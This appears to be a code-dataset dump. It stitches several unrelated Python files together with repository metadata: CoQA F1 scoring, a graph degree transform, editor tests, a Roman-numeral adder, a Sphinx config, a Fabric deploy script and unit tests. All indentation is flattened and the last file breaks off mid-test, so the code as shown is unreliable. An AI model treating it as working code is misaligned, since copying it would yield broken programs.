x_char_mask = 1 - torch.eq(x_char, 0)
query_char_mask = 1 - torch.eq(query_char, 0)
if self.use_cuda:
x_char = Variable(x_char.cuda(async=True))
x_char_mask = Variable(x_char_mask.cuda(async=True))
query_char = Variable(query_char.cuda(async=True))
query_char_mask = Variable(query_char_mask.cuda(async=True))
else:
x_char = Variable(x_char)
x_char_mask = Variable(x_char_mask)
query_char = Variable(query_char)
query_char_mask = Variable(query_char_mask)
else:
x_char = None
x_char_mask = None
query_char = None
query_char_mask = None
x_mask = 1 - torch.eq(x, 0)
query_mask = 1 - torch.eq(query, 0)
if self.use_cuda:
x = Variable(x.cuda(async=True))
x_mask = Variable(x_mask.cuda(async=True))
x_features = Variable(x_features.cuda(async=True))
x_pos = Variable(x_pos.cuda(async=True))
x_ent = Variable(x_ent.cuda(async=True))
query = Variable(query.cuda(async=True))
query_mask = Variable(query_mask.cuda(async=True))
ground_truth = Variable(ground_truth.cuda(async=True))
else:
x = Variable(x)
x_mask = Variable(x_mask)
x_features = Variable(x_features)
x_pos = Variable(x_pos)
x_ent = Variable(x_ent)
query = Variable(query)
query_mask = Variable(query_mask)
ground_truth = Variable(ground_truth)
yield (x, x_mask, x_char, x_char_mask, x_features, x_pos, x_ent, x_bert, x_bert_mask, x_bert_offsets,
query, query_mask, query_char, query_char_mask, query_bert, query_bert_mask, query_bert_offsets,
ground_truth, context_str, context_words, context_word_offsets, answer_strs, context_id, turn_ids)
# ===========================================================================
# =================== For standard evaluation in CoQA =======================
# ===========================================================================
def ensemble_predict(pred_list, score_list, voteByCnt=False):
predictions, best_scores = [], []
pred_by_examples = list(zip(*pred_list))
score_by_examples = list(zip(*score_list))
for phrases, scores in zip(pred_by_examples, score_by_examples):
d = defaultdict(float)
firstappear = defaultdict(int)
for phrase, phrase_score, index in zip(phrases, scores, range(len(scores))):
d[phrase] += 1. if voteByCnt else phrase_score
if not phrase in firstappear:
firstappear[phrase] = -index
predictions += [max(d.items(), key=lambda pair: (pair[1], firstappear[pair[0]]))[0]]
best_scores += [max(d.items(), key=lambda pair: (pair[1], firstappear[pair[0]]))[1]]
return (predictions, best_scores)
def _f1_score(pred, answers):
def _score(g_tokens, a_tokens):
common = Counter(g_tokens) & Counter(a_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1. * num_same / len(g_tokens)
recall = 1. * num_same / len(a_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
if pred is None or answers is None:
return 0
if len(answers) == 0:
return 1. if len(pred) == 0 else 0.
g_tokens = _normalize_answer(pred).split()
ans_tokens = [_normalize_answer(answer).split() for answer in answers]
scores = [_score(g_tokens, a) for a in ans_tokens]
if len(ans_tokens) == 1:
score = scores[0]
else:
score = 0
for i in range(len(ans_tokens)):
scores_one_out = scores[:i] + scores[(i + 1):]
score += max(scores_one_out)
score /= len(ans_tokens)
return score
def score(pred, truth, final_json):
assert len(pred) == len(truth)
no_ans_total = no_total = yes_total = normal_total = total = 0
no_ans_f1 = no_f1 = yes_f1 = normal_f1 = f1 = 0
all_f1s = []
for p, t, j in zip(pred, truth, final_json):
total += 1
this_f1 = _f1_score(p, t)
f1 += this_f1
all_f1s.append(this_f1)
if t[0].lower() == 'no':
no_total += 1
no_f1 += this_f1
elif t[0].lower() == 'yes':
yes_total += 1
yes_f1 += this_f1
elif t[0].lower() == 'unknown':
no_ans_total += 1
no_ans_f1 += this_f1
else:
normal_total += 1
normal_f1 += this_f1
f1 = 100. * f1 / total
if no_total == 0:
no_f1 = 0.
else:
no_f1 = 100. * no_f1 / no_total
if yes_total == 0:
yes_f1 = 0
else:
yes_f1 = 100. * yes_f1 / yes_total
if no_ans_total == 0:
no_ans_f1 = 0.
else:
no_ans_f1 = 100. * no_ans_f1 / no_ans_total
normal_f1 = 100. * normal_f1 / normal_total
result = {
'total': total,
'f1': f1,
'no_total': no_total,
'no_f1': no_f1,
'yes_total': yes_total,
'yes_f1': yes_f1,
'no_ans_total': no_ans_total,
'no_ans_f1': no_ans_f1,
'normal_total': normal_total,
'normal_f1': normal_f1,
}
return result, all_f1s
def score_each_instance(pred, truth):
assert len(pred) == len(truth)
total = 0
f1_scores = []
for p, t in zip(pred, truth):
total += 1
f1_scores.append(_f1_score(p, t))
f1_scores = [100. * x / total for x in f1_scores]
return f1_scores
def _normalize_answer(s):
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
class AverageMeter(object):
"""Computes and stores the average and current value."""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
| 39.7061
| 120
| 0.539733
|
b150d8f00cabf318f3db41541b049673749dcce5
| 1,071
|
py
|
Python
|
spektral/transforms/degree.py
|
colliner/spektral
|
b776200fd1fa820f05b559f0c1c6265e0eca4894
|
[
"MIT"
] | null | null | null |
spektral/transforms/degree.py
|
colliner/spektral
|
b776200fd1fa820f05b559f0c1c6265e0eca4894
|
[
"MIT"
] | null | null | null |
spektral/transforms/degree.py
|
colliner/spektral
|
b776200fd1fa820f05b559f0c1c6265e0eca4894
|
[
"MIT"
] | null | null | null |
import numpy as np
from spektral.utils import one_hot
class Degree(object):
"""
Concatenates to each node attribute the one-hot degree of the corresponding
node.
The adjacency matrix is expected to have integer entries and the degree is
cast to integer before one-hot encoding.
**Arguments**
- `max_degree`: the maximum degree of the nodes, i.e., the size of the
one-hot vectors.
"""
def __init__(self, max_degree):
self.max_degree = max_degree
def __call__(self, graph):
if 'a' not in graph:
raise ValueError('The graph must have an adjacency matrix')
degree = graph.a.sum(1).astype(int)
if isinstance(degree, np.matrix):
degree = np.asarray(degree)[:, 0]
degree = one_hot(degree, self.max_degree + 1)
if 'x' not in graph:
graph.x = degree
else:
graph.x = np.concatenate((graph.x, degree), axis=-1)
return graph
class MaxDegree(object):
def __call__(self, graph):
return graph.a.sum(1).max()
| 26.775
| 79
| 0.62465
|
9ae4614d807d6101de5e2d02b76b06e44c9a466f
| 1,068
|
py
|
Python
|
AutomatedTesting/Gem/PythonTests/Prefab/tests/PrefabBasicWorkflow_CreateAndDeletePrefab.py
|
NickR49/o3de
|
74d74050f2cd2f1c54fdfa2a9303c29d300adf34
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
AutomatedTesting/Gem/PythonTests/Prefab/tests/PrefabBasicWorkflow_CreateAndDeletePrefab.py
|
NickR49/o3de
|
74d74050f2cd2f1c54fdfa2a9303c29d300adf34
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
AutomatedTesting/Gem/PythonTests/Prefab/tests/PrefabBasicWorkflow_CreateAndDeletePrefab.py
|
NickR49/o3de
|
74d74050f2cd2f1c54fdfa2a9303c29d300adf34
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
def PrefabBasicWorkflow_CreateAndDeletePrefab():
CAR_PREFAB_FILE_NAME = 'car_prefab'
from editor_python_test_tools.editor_entity_utils import EditorEntity
from editor_python_test_tools.prefab_utils import Prefab
import PrefabTestUtils as prefab_test_utils
prefab_test_utils.open_base_tests_level()
# Creates a new Entity at the root level
# Asserts if creation didn't succeed
car_entity = EditorEntity.create_editor_entity()
car_prefab_entities = [car_entity]
# Asserts if prefab creation doesn't succeeds
_, car = Prefab.create_prefab(
car_prefab_entities, CAR_PREFAB_FILE_NAME)
# Asserts if prefab deletion fails
Prefab.remove_prefabs([car])
if __name__ == "__main__":
from editor_python_test_tools.utils import Report
Report.start_test(PrefabBasicWorkflow_CreateAndDeletePrefab)
| 31.411765
| 97
| 0.77809
|
bd0a492fae1f60a8ef3cf76f6bade7c2dcfcaff8
| 834
|
py
|
Python
|
Lecture.10/9.roman_add.py
|
joonion/coding-for-problem-solving
|
9f7a0b7e18803c58596899595dacc87a74b1b9d1
|
[
"MIT"
] | null | null | null |
Lecture.10/9.roman_add.py
|
joonion/coding-for-problem-solving
|
9f7a0b7e18803c58596899595dacc87a74b1b9d1
|
[
"MIT"
] | null | null | null |
Lecture.10/9.roman_add.py
|
joonion/coding-for-problem-solving
|
9f7a0b7e18803c58596899595dacc87a74b1b9d1
|
[
"MIT"
] | null | null | null |
def to_arabic(roman):
table = {"I":1, "V":5, "X":10, "L":50, "C":100, "D":500, "M":1000}
n = len(roman)
number = 0
for i in range(n):
if i < n - 1 and table[roman[i]] < table[roman[i + 1]]:
number -= table[roman[i]]
else:
number += table[roman[i]]
return number
def to_roman(N):
table={1000:'M', 900:'CM', 500:'D', 400:'CD', 100:'C', 90:'XC', 50:'L', 40:'XL', 10:'X', 9:'IX', 5:'V', 4:'IV', 1:'I'}
roman = ""
for key in table.keys():
while N >= key:
roman += table[key]
N -= key
return roman
romans = ["CCCLXIX", "LXXX", "XXIX", "CLV", "XIV", "CDXCII", "CCCXLVIII", "CCCI", "CDLXIX", "CDXCIX"]
nums = [369, 80, 29, 155, 14, 492, 348, 301, 469, 499]
n = to_arabic(input())
m = to_arabic(input())
print(to_roman(n + m))
| 27.8
| 123
| 0.492806
|
55c11fd87124425f18cbdbc6bb1474e08897d5ca
| 4,221
|
py
|
Python
|
doc/conf.py
|
dsd-test-nupack-in-github-workflow/dsd
|
55b006323550eb32398b050ca1a3e71a26719709
|
[
"MIT"
] | 2
|
2021-08-17T12:08:37.000Z
|
2021-11-02T05:57:55.000Z
|
doc/conf.py
|
dsd-test-nupack-in-github-workflow/dsd
|
55b006323550eb32398b050ca1a3e71a26719709
|
[
"MIT"
] | 56
|
2020-11-19T19:39:16.000Z
|
2022-03-29T10:26:04.000Z
|
doc/conf.py
|
dsd-test-nupack-in-github-workflow/dsd
|
55b006323550eb32398b050ca1a3e71a26719709
|
[
"MIT"
] | 2
|
2021-02-13T02:43:47.000Z
|
2022-03-29T02:53:53.000Z
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import sphinx.util.inspect as inspect
import sphinx.ext.autodoc as auto
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../dsd'))
# Type "make html" at the command line to generate the documentation.
# -- Project information -----------------------------------------------------
project = 'dsd: DNA sequence designer'
copyright = '2020, David Doty and Damien Woods'
author = 'David Doty and Damien Woods'
# The full version, including alpha/beta/rc tags
release = '0.1.0'
# version = __version__
# release = __version__
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
# 'sphinx.ext.napoleon',
]
autodoc_typehints = "description"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# html_theme = 'alabaster'
# html_theme = "classic"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# use order in source rather than alphabetical order
autodoc_member_order = 'bysource'
# intersphinx_mapping = {'python': ('https://docs.python.org/3', None)}
# removes constant values from documentation that are longer than 100 characters.
# taken from
# https://stackoverflow.com/questions/25145817/ellipsis-truncation-on-module-attribute-value-in-sphinx-generated-documentatio/25163963#25163963
# from sphinx.ext.autodoc import DataDocumenter, ModuleLevelDocumenter, SUPPRESS
# from sphinx.util.inspect import safe_repr
length_limit = 50
# below is for documenting __init__ with automodule
# https://stackoverflow.com/questions/5599254/how-to-use-sphinxs-autodoc-to-document-a-classs-init-self-method
def skip(app, what, name, obj, would_skip, options):
if name == "__init__":
return False
return would_skip
def setup(app):
app.connect("autodoc-skip-member", skip)
#
# autoclass_content = 'both'
def add_directive_header(self, sig):
auto.ModuleLevelDocumenter.add_directive_header(self, sig)
if not self.options.annotation:
try:
# objrepr = inspect.safe_repr(self.object)
objrepr = inspect.object_description(self.object)
# PATCH: truncate the value if longer than length_limit characters
if len(objrepr) > length_limit:
objrepr = objrepr[:length_limit] + "..."
except ValueError:
pass
else:
self.add_line(u' :annotation: = ' + objrepr, '<autodoc>')
elif self.options.annotation is auto.SUPPRESS:
pass
else:
self.add_line(u' :annotation: %s' % self.options.annotation,
'<autodoc>')
auto.DataDocumenter.add_directive_header = add_directive_header
# https://stackoverflow.com/questions/56336234/build-fail-sphinx-error-contents-rst-not-found
master_doc = 'index'
| 34.040323
| 143
| 0.688226
|
1f4664ac566cd1be4f688828426cb85c05590c35
| 2,013
|
py
|
Python
|
fabfile.py
|
c17r/aturan-calendar-bot
|
4854aa4af17da16aec8ac4cc11de09bffe2e7238
|
[
"MIT"
] | 1
|
2022-01-11T06:03:56.000Z
|
2022-01-11T06:03:56.000Z
|
fabfile.py
|
c17r/aturan-calendar-bot
|
4854aa4af17da16aec8ac4cc11de09bffe2e7238
|
[
"MIT"
] | 1
|
2021-02-10T02:53:27.000Z
|
2021-02-23T21:42:34.000Z
|
fabfile.py
|
c17r/aturan-calendar-bot
|
4854aa4af17da16aec8ac4cc11de09bffe2e7238
|
[
"MIT"
] | 1
|
2022-01-11T06:03:59.000Z
|
2022-01-11T06:03:59.000Z
|
from datetime import datetime
from fabric.api import task, env, settings, cd, sudo, run, local, put, path, shell_env
server_user = 'aturan_calendar'
stamp = datetime.now().strftime("v%Y%m%d%H%M%S")
stamptar = server_user + "-" + stamp + ".tar"
stampzip = stamptar + ".gz"
env.stamp = stamp
env.stamptar = stamptar
env.stampzip = stampzip
env.server_user = server_user
@task
def live():
env.hosts = [
"crow.endrun.org"
]
@task
def deploy():
local('make clean')
local('pipenv run python setup.py sdist bdist_wheel --universal')
local('tar cf %(stamptar)s run.sh' % env)
local('(cd dist && tar rf ../%(stamptar)s *.tar.gz)' % env)
local('gzip %(stamptar)s' % env)
put(stampzip, '/tmp/%(stampzip)s' % env)
local('rm %(stampzip)s' % env)
with settings(sudo_user=server_user):
with cd('/home/%(server_user)s/run' % env):
sudo('mkdir -p %(stamp)s/src' % env)
sudo('mkdir -p %(stamp)s/venv' % env)
with cd('/home/%(server_user)s/run/%(stamp)s' % env):
sudo('tar xfz /tmp/%(stampzip)s -C ./src/' % env)
sudo('rm /tmp/%(stampzip)s' % env)
with settings(sudo_user=server_user):
with cd('/home/%(server_user)s/run/%(stamp)s' % env):
with shell_env(PATH='/opt/pyenv/bin/:$PATH', PYENV_ROOT='/opt/pyenv'):
sudo('virtualenv venv -p $(pyenv prefix 3.6.2)/bin/python' % env)
with path('./venv/bin', behavior='prepend'):
sudo('pip install --quiet --no-cache-dir ./src/*.tar.gz' % env)
with cd('/home/%(server_user)s/run' % env):
sudo('ln -nsf $(basename $(readlink -f current)) previous' % env)
sudo('ln -nsf %(stamp)s current' % env)
@task
def prune():
with settings(sudo_user=server_user):
with cd('/home/%(server_user)s/run' % env):
sudo('[ -h current ] && $(for dir in $(ls -1f | grep -e "/$" | grep -ve "$(readlink previous)\|$(readlink current)"); do rm -r $dir; done) || true')
| 31.453125
| 160
| 0.584203
|
46ab2aa162ed6168ec4d79db5d73daacb4290d42
| 427
|
py
|
Python
|
app/Middleware/logger_middleware.py
|
psyphore/flask-phone-book
|
cceec3caabdeb03f260d37f3b55d5aa7a52c30c2
|
[
"MIT"
] | null | null | null |
app/Middleware/logger_middleware.py
|
psyphore/flask-phone-book
|
cceec3caabdeb03f260d37f3b55d5aa7a52c30c2
|
[
"MIT"
] | 2
|
2021-03-19T03:39:56.000Z
|
2021-06-08T20:28:03.000Z
|
app/Middleware/logger_middleware.py
|
psyphore/flask-phone-book
|
cceec3caabdeb03f260d37f3b55d5aa7a52c30c2
|
[
"MIT"
] | null | null | null |
from time import time as timer
from datetime import (datetime)
from maya import (Datetime, when)
class LoggerMiddleware(object):
def __init__(self, app):
self.app = app
self.start = timer()
self.end = None
def __call__(self, environ, start_response):
self.end = timer() - self.start
print(f'> incoming: {datetime.utcnow()} in {round(self.end * 1000, 2)} ')
return self.app(environ, start_response)
| 30.5
| 77
| 0.690867
|
333a090f035762301ef17458734ba1df0971fbb3
| 897
|
py
|
Python
|
python/tests/set_replace/test_match.py
|
phcerdan/wolfram_model
|
a4dd26295df7cb995ce666007860ca86efa38e8a
|
[
"MIT"
] | 12
|
2020-04-19T00:30:57.000Z
|
2021-12-20T02:24:35.000Z
|
python/tests/set_replace/test_match.py
|
SicachaMauricio/wolfram_model
|
a4dd26295df7cb995ce666007860ca86efa38e8a
|
[
"MIT"
] | 5
|
2020-04-18T06:08:39.000Z
|
2020-05-24T14:47:29.000Z
|
python/tests/set_replace/test_match.py
|
SicachaMauricio/wolfram_model
|
a4dd26295df7cb995ce666007860ca86efa38e8a
|
[
"MIT"
] | 4
|
2020-04-19T21:31:20.000Z
|
2022-02-11T19:47:00.000Z
|
import pytest
import numpy as np
import wolfram_model as wm
def test_match_enums():
order_function = wm.matcher.ordering_function.RuleIndex
print(order_function)
order_direction = wm.matcher.ordering_direction.Normal
print(order_direction)
ordering_spec = [[order_function, order_direction]]
def a_dummy_get_atoms_vector_func(long_):
return [long_, long_]
def test_matcher_constructor():
rule = wm.rule(inputs=[[-1,-2], [-2, -3]], outputs=[[-1,-3], [-4, -2], [-1, -4]])
atoms_index = wm.atoms_index(a_dummy_get_atoms_vector_func)
ordering_spec = [[wm.matcher.ordering_function.RuleIndex,
wm.matcher.ordering_direction.Normal]]
matcher = wm.matcher(
rules=[rule],
atoms_index=atoms_index,
get_atoms_vector=a_dummy_get_atoms_vector_func,
ordering=ordering_spec
)
print(matcher.all_matches())
| 30.931034
| 85
| 0.702341
|
299f0b24d01a62be63912fb06735373c88146133
| 22,378
|
py
|
Python
|
tests.py
|
ashishjayamohan/Tread
|
f812c48d27c6d9ca33e3579d7a74ee43d93df310
|
[
"MIT"
] | 3
|
2020-09-15T19:42:04.000Z
|
2021-05-10T23:00:53.000Z
|
tests.py
|
ashishjayamohan/Tread
|
f812c48d27c6d9ca33e3579d7a74ee43d93df310
|
[
"MIT"
] | 2
|
2020-09-17T02:49:05.000Z
|
2020-09-19T22:20:31.000Z
|
tests.py
|
ashishjayamohan/Tread
|
f812c48d27c6d9ca33e3579d7a74ee43d93df310
|
[
"MIT"
] | 1
|
2020-09-15T19:00:04.000Z
|
2020-09-15T19:00:04.000Z
|
from pocha import describe, it
import scripts.vectorization_functions as vf
def assert_raises(*exceptions):
def decorator(fn):
def func_wrapper(*args, **kwargs):
threw = False
try:
fn(*args, **kwargs)
except exceptions:
threw = True
assert threw
return func_wrapper
return decorator
class Almost:
def __init__(self, n, tol=1e-12):
self._num = n
self.tol = tol
def __eq__(self, other):
diff = self._num - other
if diff < 0: diff = -diff
return diff < self.tol
@describe('Basic Functions')
def test_basic_functions():
import scripts.basic_functions as bf
@describe('Add')
def test_add():
@it('Empty Array')
def _():
assert bf.add([]) == 0
@it('Ints')
def _():
assert bf.add([5, 3, 1, 4, 2], mode='int') == 15
@it('Floats')
def _():
assert bf.add([5.0, 2.5, 1.5, 4.0, 2.0], mode='float') == 15.0
@it('Strings')
def _():
assert bf.add(['4.5', '3.5', '1', '4.0', '2'], mode='str') == 15.0
@it('Mixed')
def _():
assert bf.add(['5', 3.0, 1, '4.0', 2.0], mode='mixed') == 15.0
@describe('Average')
def test_average():
@it('Empty Array')
def _():
assert bf.average([]) == 0.0
@it('One Element (int)')
def _():
assert bf.average([1]) == 1.0
@it('One Element (float)')
def _():
assert bf.average([1.0]) == 1.0
@it('Two Elements')
def _():
assert bf.average([1, 3]) == 2.0
@it('Many Elements')
def _():
assert bf.average([1, 2, 3, 4, 5, 6]) == 3.5
@describe('Types')
def test_types():
@it('Empty Array')
def _():
assert bf.types([]) == []
@it('One Element')
def _():
assert bf.types([3]) == [type(3)]
@it('Two Elements')
def _():
assert bf.types([3, '3']) == [type(3), type('3')]
@it('Many Elements')
def _():
assert bf.types([3, '3', 3.0, [1, 2, 3], {'a': 1}]) == [type(3), type('3'), type(3.0), type([1, 2, 3]), type({'a': 1})]
@describe('Highest Frequency')
def test_highest_frequency():
@it('Empty Array')
def _():
assert bf.highest_frequency([]) is None
@it('One Element')
def _():
assert bf.highest_frequency([1]) == ((1,), 1)
@it('Two Elements (Same)')
def _():
assert bf.highest_frequency([1, 1]) == ((1,), 2)
@it('Two Elements (Different)')
def _():
assert bf.highest_frequency([1, 2]) == ((1, 2), 1)
@it('Many Elements')
def _():
assert bf.highest_frequency([1, 5, 2, 3, 1, 4, 1, 5, 5]) == ((1, 5), 3)
@describe('Frequency')
def test_frequency():
@it('Empty Array')
def _():
assert bf.frequency([]) == {}
@it('One Element')
def _():
assert bf.frequency([1]) == {1: 1}
@it('Two Elements (Same)')
def _():
assert bf.frequency([1, 1]) == {1: 2}
@it('Two Elements (Different)')
def _():
assert bf.frequency([1, 2]) == {1: 1, 2: 1}
@it('Same Value, Different Types (cast=False)')
def _():
assert bf.frequency([1, 1.0, '1', '1.0'], cast=False) == {1: 1, 1.0: 1, '1': 1, '1.0': 1}
@it('Same Value, Different Types (cast=True)')
def _():
assert bf.frequency([1, 1.0, '1', '1.0'], cast=True) == {1.0: 4}
@describe('Determine Mode')
def test_determine_mode():
@it('Empty Array')
def _():
assert bf.determine_mode([]) is None
@it('One Element (int)')
def _():
assert bf.determine_mode([1]) == 'int'
@it('One Element (float)')
def _():
assert bf.determine_mode([1.0]) == 'float'
@it('One Element (str)')
def _():
assert bf.determine_mode(['1']) == 'str'
@it('Many Elements (int)')
def _():
assert bf.determine_mode([1, 2, 3]) == 'int'
@it('Many Elements (float)')
def _():
assert bf.determine_mode([1.0, 2.0, 3.0]) == 'float'
@it('Many Elements (str)')
def _():
assert bf.determine_mode(['1', '2', '3']) == 'str'
@it('Many Elements (mixed)')
def _():
assert bf.determine_mode([1, 2.0, '3']) == 'mixed'
@describe('Median')
def test_median():
@it('Empty Array')
def _():
assert bf.median([]) is None
@it('One Element (int)')
def _():
assert bf.median([1]) == 1
@it('One Element (float)')
def _():
assert bf.median([1.0]) == 1.0
@it('Two Elements')
def _():
assert bf.median([1, 2]) == 1.5
@it('Many Elements')
def _():
assert bf.median([1, 2, 3, 4, 5, 6]) == 3.5
@describe('Quartiles')
def test_quartiles():
@it('Empty Array')
def _():
assert bf.quartiles([]) is None
@it('One Element')
def _():
assert bf.quartiles([1]) == (1, 1, 1, 1, 1)
@it('Two Elements')
def _():
assert bf.quartiles([2, 1]) == (1, None, 1.5, None, 2)
@it('Three Elements')
def _():
assert bf.quartiles([1, 3, 2]) == (1, 1, 2, 3, 3)
@it('Six Elements')
def _():
assert bf.quartiles([4, 5, 6, 1, 2, 3]) == (1, 2, 3.5, 5, 6)
@it('Seven Elements')
def _():
assert bf.quartiles([4, 2, 5, 3, 6, 1, 7]) == (1, 2, 4, 6, 7)
@describe('Mode')
def test_mode():
@it('Empty Array')
def _():
assert bf.mode([]) == None
@it('One Element')
def _():
assert bf.mode([1]) == 1
@it('Two Elements (Same)')
def _():
assert bf.mode([1, 1]) == 1
@it('Two Elements (Different)')
def _():
assert bf.mode([1, 2]) == None
@it('Six Elements (Uniform)')
def _():
assert bf.mode([1, 2, 3, 4, 5, 6]) == None
@it('Six Elements (Non-Uniform)')
def _():
assert bf.mode([1, 2, 3, 4, 5, 1]) == 1
@describe('Length')
def test_length():
@it('Empty Array')
def _():
assert bf.length([]) == 0
@it('One Element')
def _():
assert bf.length([1]) == 1
@it('Two Elements')
def _():
assert bf.length([1, 2]) == 2
@it('Five Elements')
def _():
assert bf.length([1, 2, 3, 4, 5]) == 5
@describe('Pare Unique')
def test_pare_unique():
@it('Empty Array')
def _():
assert bf.pare_unique([]) == []
@it('One Element')
def _():
assert bf.pare_unique([1]) == [1]
@it('Two Elements (Same)')
def _():
assert bf.pare_unique([1, 1]) == [1]
@it('Two Elements (Different)')
def _():
assert bf.pare_unique([1, 2]) == [1, 2]
@it('Six Elements (Same)')
def _():
assert bf.pare_unique([1, 1, 1, 1, 1, 1]) == [1]
@it('Six Elements (Unique)')
def _():
assert bf.pare_unique([1, 2, 3, 4, 5, 6]) == [1, 2, 3, 4, 5, 6]
@describe('Math Functions')
def test_math_functions():
import scripts.math_functions as mf
@describe('Add')
def test_add_num():
@it('1 + 1 = 2')
def _():
assert mf.add_num(1, 1) == 2
@it('2 + 2 = 4')
def _():
assert mf.add_num(2, 2) == 4
@it('2.5 + 3.5 = 6')
def _():
assert mf.add_num(2.5, 3.5) == 6
@it('34,567 + 24,211 = 58,778')
def _():
assert mf.add_num(34567, 24211) == 58778
@describe('Subtract')
def test_subtract_num():
@it('1 - 1 = 0')
def _():
assert mf.subtract_num(1, 1) == 0
@it('2 - 3 = -1')
def _():
assert mf.subtract_num(2, 3) == -1
@it('2.5 - 3.5 = -1')
def _():
assert mf.subtract_num(2.5, 3.5) == -1
@it('37,831 - 84,521 = -46,690')
def _():
assert mf.subtract_num(37831, 84521) == -46690
@describe('Absolute Difference')
def test_abs_diff():
@it('|3 - 1| = 2')
def _():
assert mf.abs_diff(3, 1) == 2
@it('|5 - 10| = 5')
def _():
assert mf.abs_diff(5, 10) == 5
@it('|28,542 - 61,317| = 32,775')
def _():
assert mf.abs_diff(28542, 61317) == 32775
@describe('Divide')
def test_divide_num():
@it('k / 0 raises TypeError')
@assert_raises(TypeError)
def _():
mf.divide_num(3, 0)
@it('6 / 3 = 2')
def _():
assert mf.divide_num(6, 3) == 2
@it('7 / 2 = 3.5')
def _():
assert mf.divide_num(7, 2) == 3.5
@it('93.6 / 15.6 = 6')
def _():
assert mf.divide_num(93.6, 15.6) == 6
@it('200,662 / 28,666 = 7')
def _():
assert mf.divide_num(200662, 28666) == 7
@describe('Multiply')
def test_multiply_num():
@it('12 * 5 = 60')
def _():
assert mf.multiply_num(12, 5) == 60
@it('7 * 7 = 49')
def _():
assert mf.multiply_num(7, 7) == 49
@it('6.1 * 36.55 == 222.955')
def _():
from math import isclose
assert isclose(mf.multiply_num(6.1, 36.55), 222.955)
@it('5,048 * 729 = 3,679,992')
def _():
assert mf.multiply_num(5048, 729) == 3679992
@describe('Modulo')
def test_modulo():
@it('k % 0 raises ZeroDivisionError')
@assert_raises(ZeroDivisionError)
def _():
mf.mod(5, 0)
@it('7 % 4 = 3')
def _():
assert mf.mod(7, 4) == 3
@it('37 % 3 = 1')
def _():
assert mf.mod(37, 3) == 1
@it('551 % 13 = 5')
def _():
assert mf.mod(551, 13) == 5
@describe('Factorial')
def test_factorial():
@it('0! = 1')
def _():
assert mf.factorial(0) == 1
@it('1! = 1')
def _():
assert mf.factorial(1) == 1
@it('2! = 2')
def _():
assert mf.factorial(2) == 2
@it('3! = 6')
def _():
assert mf.factorial(3) == 6
@it('10! = 3628800')
def _():
assert mf.factorial(10) == 3628800
@describe('Choose')
def test_choose():
@it('0 choose 0 = 1')
def _():
assert mf.choose(0, 0) == 1
@it('3 choose 2 = 3')
def _():
assert mf.choose(3, 2) == 3
@it('10 choose 4 = 210')
def _():
assert mf.choose(10, 4) == 210
@it('n choose r for r > n raises ValueError')
@assert_raises(ValueError)
def _():
mf.choose(2, 3)
@it('n choose r for n < 0 raises ValueError')
@assert_raises(ValueError)
def _():
mf.choose(-3, 2)
@it('n choose r for r < 0 raises ValueError')
@assert_raises(ValueError)
def _():
mf.choose(3, -2)
@describe('Number of Digits')
def test_length_num():
@it('1 => 1')
def _():
assert mf.length_num(1) == 1
@it('-1 => 1')
def _():
assert mf.length_num(-1) == 1
@it('1.1 => 2')
def _():
assert mf.length_num(1.1) == 2
@it('43 => 2')
def _():
assert mf.length_num(43) == 2
@it('-264.012 => 6')
def _():
assert mf.length_num(-264.012) == 6
@describe('Echo')
def test_echo():
@it('1')
def _():
assert mf.echo(1) == '1'
@it('-3')
def _():
assert mf.echo(-3) == '-3'
@it('2.5')
def _():
assert mf.echo(2.5) == '2.5'
@it('-123456789.012345')
def _():
assert mf.echo(-123456789.012345) == '-123456789.012345'
@describe('Output')
def test_output():
from io import StringIO
import sys
class Capturing(list):
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio
sys.stdout = self._stdout
with Capturing() as output:
mf.out(1)
mf.out(24.5)
mf.out(-34.77)
mf.out(1234567)
@it('1')
def _():
assert output[0] == '1'
@it('24.5')
def _():
assert output[1] == '24.5'
@it('-34.77')
def _():
assert output[2] == '-34.77'
@it('1234567')
def _():
assert output[3] == '1234567'
@describe('Percent')
def test_percent():
@it('10% of 40 = 4')
def _():
assert mf.percent(10, 40) == 4
@it('4% of 800 = 32')
def _():
assert mf.percent(4, 800) == 32
@it('92% of 3 = 2.76')
def _():
from math import isclose
assert isclose(mf.percent(92, 3), 2.76)
@describe('Digit Array')
def test_digit_arr():
@it('1')
def _():
assert mf.digit_arr(1) == [1]
@it('-32')
def _():
assert mf.digit_arr(-32) == [3, 2]
@it('32.624')
def _():
